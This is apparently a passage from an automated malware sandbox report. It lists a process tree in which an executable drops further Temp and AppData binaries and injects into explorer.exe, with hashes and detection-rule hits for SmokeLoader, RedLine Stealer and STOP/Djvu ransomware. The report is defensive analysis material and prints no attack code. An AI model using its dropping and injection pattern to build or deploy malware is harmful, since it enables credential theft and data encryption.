                                                                                                                                  2022-10-17 20:07:20 UTC1162INData Raw: 33 22 2c 5b 22 77 61 72 6e 69 6e 67 42 6c 75 65 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 77 61 72 6e 69 6e 67 42 6c 75 65 22 2c 22 41 61 30 6b 69 52 42 53 46 39 6f 35 4d 35 6e 4d 76 64 71 6e 62 37 6f 6e 57 6b 55 48 4b 4a 67 64 4b 45 57 55 70 58 45 32 4a 30 57 46 50 71 5f 61 4f 61 44 72 45 64 78 6d 62 7a 4e 47 39 6b 65 71 55 49 46 6d 46 67 6c 74 56 7a 4d 70 42 61 76 6f 61 30 47 39 75 2d 6e 5f 41 4c 76 57 22 5d 7d 2c 2d 31 5d 2c 5b 22 43 6f 72 65 57 61 72 6e 69 6e 67 47 4b 22 2c 5b 5d 2c 7b 66 6f 72 63 65 57 61 72 6e 69 6e 67 3a 66 61 6c 73 65 7d 2c 37 32 35 5d 2c 5b 22 63 72 3a 31 33 34 34 34 38 36 22 2c 5b 22 52 65 61 63 74 44 4f 4d 2e 63 6c 61 73 73 69 63 2e 70 72 6f 64 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 52 65 61 63 74 44 4f 4d 2e 63 6c 61 73 73 69 63 2e 70 72 6f
                                                                                                                                  Data Ascii: 3",["warningBlue"],{__rc:["warningBlue","Aa0kiRBSF9o5M5nMvdqnb7onWkUHKJgdKEWUpXE2J0WFPq_aOaDrEdxmbzNG9keqUIFmFgltVzMpBavoa0G9u-n_ALvW"]},-1],["CoreWarningGK",[],{forceWarning:false},725],["cr:1344486",["ReactDOM.classic.prod"],{__rc:["ReactDOM.classic.pro
                                                                                                                                  2022-10-17 20:07:20 UTC1162INData Raw: 31 30 61 30 0d 0a 50 53 39 4a 38 4c 4a 71 52 38 54 67 2d 63 4f 71 48 72 69 32 70 6b 67 74 70 6f 68 67 6d 77 44 54 72 39 70 54 5a 41 2d 61 6b 54 6c 59 37 7a 6a 79 47 41 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 38 33 38 34 34 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e 75 6c 6c 2c 22 41 61 33 39 45 35 55 48 50 32 66 63 36 74 73 4d 6b 49 7a 75 61 6c 65 61 51 57 76 75 78 65 30 41 76 5a 76 72 4b 79 52 67 67 4b 45 55 75 4c 5f 30 55 32 74 44 34 6f 45 73 4d 5f 42 5a 35 7a 49 33 34 64 7a 6f 4d 65 72 66 6d 70 78 62 2d 73 6f 5a 71 41 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 33 34 34 34 38 37 22 2c 5b 22 52 65 61 63 74 44 4f 4d 46 6f 72 6b 65 64 2d 70 72 6f 64 2e 63 6c 61 73 73 69 63 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 52 65 61 63 74 44 4f 4d 46 6f 72 6b 65 64 2d 70 72 6f
                                                                                                                                  Data Ascii: 10a0PS9J8LJqR8Tg-cOqHri2pkgtpohgmwDTr9pTZA-akTlY7zjyGA"]},-1],["cr:983844",[],{__rc:[null,"Aa39E5UHP2fc6tsMkIzualeaQWvuxe0AvZvrKyRggKEUuL_0U2tD4oEsM_BZ5zI34dzoMerfmpxb-soZqA"]},-1],["cr:1344487",["ReactDOMForked-prod.classic"],{__rc:["ReactDOMForked-pro
                                                                                                                                  2022-10-17 20:07:20 UTC1164INData Raw: 56 52 54 6b 68 35 44 44 31 41 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 31 38 37 31 35 39 22 2c 5b 22 42 6c 75 65 43 6f 6d 70 61 74 42 72 6f 6b 65 72 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 42 6c 75 65 43 6f 6d 70 61 74 42 72 6f 6b 65 72 22 2c 22 41 61 32 52 72 53 4b 57 75 50 35 63 73 67 69 2d 51 43 74 37 37 72 53 36 64 6e 73 30 6b 47 74 66 30 6b 49 36 7a 70 65 71 6c 38 34 78 72 68 49 47 31 4e 56 36 71 79 68 47 4d 6c 54 70 76 33 4e 51 76 58 66 44 62 72 43 55 75 4a 56 47 53 54 77 44 5a 56 52 54 6b 68 35 44 44 31 41 22 5d 7d 2c 2d 31 5d 2c 5b 22 49 6d 6d 65 64 69 61 74 65 41 63 74 69 76 65 53 65 63 6f 6e 64 73 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 73 61 6d 70 6c 69 6e 67 5f 72 61 74 65 3a 30 7d 2c 34 32 33 5d 5d 2c 72 65 71 75 69 72 65 3a 5b 5b 22 42 44 43 6c 69 65
                                                                                                                                  Data Ascii: VRTkh5DD1A"]},-1],["cr:1187159",["BlueCompatBroker"],{__rc:["BlueCompatBroker","Aa2RrSKWuP5csgi-QCt77rS6dns0kGtf0kI6zpeql84xrhIG1NV6qyhGMlTpv3NQvXfDbrCUuJVGSTwDZVRTkh5DD1A"]},-1],["ImmediateActiveSecondsConfig",[],{sampling_rate:0},423]],require:[["BDClie
                                                                                                                                  2022-10-17 20:07:20 UTC1165INData Raw: 69 6d 65 53 70 65 6e 74 42 69 74 41 72 72 61 79 4c 6f 67 67 65 72 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 44 65 66 65 72 72 65 64 43 6f 6f 6b 69 65 22 2c 22 61 64 64 54 6f 51 75 65 75 65 22 2c 5b 5d 2c 5b 22 5f 6a 73 5f 64 61 74 72 22 2c 22 2d 4c 56 4e 59 7a 39 36 56 38 63 4c 7a 35 70 69 30 37 6d 5f 30 65 6f 63 22 2c 36 33 30 37 32 30 30 30 30 30 30 2c 22 2f 22 2c 74 72 75 65 2c 66 61 6c 73 65 2c 74 72 75 65 5d 5d 2c 5b 22 44 65 66 65 72 72 65 64 43 6f 6f 6b 69 65 22 2c 22 61 64 64 54 6f 51 75 65 75 65 22 2c 5b 5d 2c 5b 22 5f 6a 73 5f 73 62 22 2c 22 2d 4c 56 4e 59 39 59 6a 56 4f 38 49 73 30 6d 74 30 6e 48 4f 6d 34 68 6f 22 2c 36 33 30 37 32 30 30 30 30 30 30 2c 22 2f 22 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 74 72 75 65 5d 5d 5d 7d 2c 68 73
                                                                                                                                  Data Ascii: imeSpentBitArrayLogger","init",[],[]],["DeferredCookie","addToQueue",[],["_js_datr","-LVNYz96V8cLz5pi07m_0eoc",63072000000,"/",true,false,true]],["DeferredCookie","addToQueue",[],["_js_sb","-LVNY9YjVO8Is0mt0nHOm4ho",63072000000,"/",false,false,true]]]},hs


                                                                                                                                  Click to jump to process

                                                                                                                                  Click to jump to process

                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                  Click to jump to process

                                                                                                                                  Target ID:0
                                                                                                                                  Start time:22:05:16
                                                                                                                                  Start date:17/10/2022
                                                                                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Users\user\Desktop\file.exe
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:222208 bytes
                                                                                                                                  MD5 hash:644232606A176287A73169B177EB8752
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000003.307169162.0000000000720000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.431462831.00000000008C1000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.426191617.0000000000720000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.426191617.0000000000720000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.425983176.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.426259430.0000000000741000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.426259430.0000000000741000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                  Reputation:low

                                                                                                                                  Target ID:1
                                                                                                                                  Start time:22:05:23
                                                                                                                                  Start date:17/10/2022
                                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                                                                                  Imagebase:0x7ff69bc80000
                                                                                                                                  File size:3933184 bytes
                                                                                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000000.410751234.0000000005261000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000000.410751234.0000000005261000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                  Reputation:high

                                                                                                                                  Target ID:4
                                                                                                                                  Start time:22:06:28
                                                                                                                                  Start date:17/10/2022
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\6246.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\6246.exe
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:753664 bytes
                                                                                                                                  MD5 hash:36FC2440660C5F4509C3ABCDDE9A1C3A
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.533353582.0000000000926000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000004.00000002.535198991.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000004.00000002.535198991.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                  Reputation:low

                                                                                                                                  Target ID:5
                                                                                                                                  Start time:22:06:29
                                                                                                                                  Start date:17/10/2022
                                                                                                                                  Path:C:\Users\user\AppData\Roaming\thduhcf
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Users\user\AppData\Roaming\thduhcf
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:222208 bytes
                                                                                                                                  MD5 hash:644232606A176287A73169B177EB8752
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.574920168.0000000000741000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.574920168.0000000000741000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.572802544.0000000000700000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000003.549038342.0000000000710000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.572996801.0000000000710000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.572996801.0000000000710000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.575526582.0000000000851000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  Reputation:low

                                                                                                                                  Target ID:6
                                                                                                                                  Start time:22:06:30
                                                                                                                                  Start date:17/10/2022
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\69A9.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\69A9.exe
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:221696 bytes
                                                                                                                                  MD5 hash:BD0DFD6CBAE2B012D4A5F155D10ED054
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.517310992.00000000024C1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.517310992.00000000024C1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.505319031.0000000000841000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.503555817.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.511843457.00000000021D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.511843457.00000000021D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                  Reputation:low

                                                                                                                                  Target ID:7
                                                                                                                                  Start time:22:06:35
                                                                                                                                  Start date:17/10/2022
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\7795.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\7795.exe
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:223744 bytes
                                                                                                                                  MD5 hash:D878530A6E5C388668853A620D1B6E05
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000007.00000000.492089857.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.531881974.0000000000921000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000007.00000002.531437946.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000000.494940938.0000000000921000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000007.00000000.499882815.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000000.500354218.0000000000921000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                  Reputation:low

                                                                                                                                  Target ID:8
                                                                                                                                  Start time:22:06:36
                                                                                                                                  Start date:17/10/2022
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\6246.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\6246.exe
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:753664 bytes
                                                                                                                                  MD5 hash:36FC2440660C5F4509C3ABCDDE9A1C3A
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000008.00000000.496174295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000008.00000000.524094887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000008.00000000.524094887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000008.00000000.524094887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000008.00000000.524094887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000008.00000000.506719194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000008.00000000.506719194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000008.00000000.506719194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000008.00000000.506719194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000008.00000000.520562150.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000008.00000000.520562150.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000008.00000000.520562150.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000008.00000000.520562150.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  Reputation:low

                                                                                                                                  Target ID:9
                                                                                                                                  Start time:22:06:37
                                                                                                                                  Start date:17/10/2022
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\837D.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\837D.exe
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:223744 bytes
                                                                                                                                  MD5 hash:D878530A6E5C388668853A620D1B6E05
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000009.00000000.491916459.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000009.00000000.499526693.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000009.00000002.533230788.0000000000661000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000009.00000002.532778418.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000009.00000000.500012370.0000000000661000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000009.00000000.493912114.0000000000661000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                  Reputation:low

                                                                                                                                  Target ID:10
                                                                                                                                  Start time:22:06:39
                                                                                                                                  Start date:17/10/2022
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  Imagebase:0x140000000
                                                                                                                                  File size:3633152 bytes
                                                                                                                                  MD5 hash:D30C815C9E13D428430F2A8B4018D3D5
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                  Reputation:low

                                                                                                                                  Target ID:14
                                                                                                                                  Start time:22:06:42
                                                                                                                                  Start date:17/10/2022
                                                                                                                                  Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                  Imagebase:0x970000
                                                                                                                                  File size:3611360 bytes
                                                                                                                                  MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000E.00000000.490370694.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                  Reputation:high

                                                                                                                                  Target ID:15
                                                                                                                                  Start time:22:06:45
                                                                                                                                  Start date:17/10/2022
                                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\explorer.exe
                                                                                                                                  Imagebase:0x7ff69bc80000
                                                                                                                                  File size:3933184 bytes
                                                                                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  Target ID:16
                                                                                                                                  Start time:22:06:48
                                                                                                                                  Start date:17/10/2022
                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 520
                                                                                                                                  Imagebase:0x1380000
                                                                                                                                  File size:434592 bytes
                                                                                                                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  Target ID:17
                                                                                                                                  Start time:22:06:49
                                                                                                                                  Start date:17/10/2022
                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 520
                                                                                                                                  Imagebase:0x1380000
                                                                                                                                  File size:434592 bytes
                                                                                                                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  Target ID:19
                                                                                                                                  Start time:22:07:16
                                                                                                                                  Start date:17/10/2022
                                                                                                                                  Path:C:\Users\user\AppData\Roaming\idduhcf
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Users\user\AppData\Roaming\idduhcf
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:221696 bytes
                                                                                                                                  MD5 hash:BD0DFD6CBAE2B012D4A5F155D10ED054
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  Target ID:20
                                                                                                                                  Start time:22:07:18
                                                                                                                                  Start date:17/10/2022
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\4316.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\4316.exe
                                                                                                                                  Imagebase:0x1020000
                                                                                                                                  File size:418816 bytes
                                                                                                                                  MD5 hash:2D29421E985E4FB5F6ABB42FA3A502C1
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Joe Sandbox ML

                                                                                                                                  Target ID:21
                                                                                                                                  Start time:22:07:20
                                                                                                                                  Start date:17/10/2022
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff7fcd70000
                                                                                                                                  File size:625664 bytes
                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  Reset < >

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:4.1%
                                                                                                                                    Dynamic/Decrypted Code Coverage:3.5%
                                                                                                                                    Signature Coverage:15.3%
                                                                                                                                    Total number of Nodes:1779
                                                                                                                                    Total number of Limit Nodes:29
